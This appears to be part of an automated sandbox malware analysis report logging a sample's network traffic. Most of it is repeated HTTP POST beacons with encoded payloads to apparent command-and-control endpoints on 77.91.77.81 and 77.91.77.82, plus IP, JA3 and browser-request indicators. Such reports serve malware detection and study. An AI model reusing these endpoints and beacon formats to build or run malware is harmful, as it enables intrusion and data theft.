                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
                          Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
                          Source: Joe Sandbox ViewIP Address: 85.28.47.31 85.28.47.31
                          Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                          Source: Joe Sandbox ViewASN Name: GES-ASRU GES-ASRU
                          Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Joe Sandbox ViewJA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
                          Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49716 version: TLS 1.0
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.31
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,KiUserExceptionDispatcher,InternetCloseHandle,InternetCloseHandle,0_2_00405000
                          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Kvu6flRNlG2X2Hs&MD=Y7YGDEsS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.6lVpXqFohkI.es5.O/am=BBkMYHQbgUA8nAMfoBQIGQAAAAAAAAAAtAEAAMw/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHuLzpdGtAi2fZZI0B1GZPFa_4BvA/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
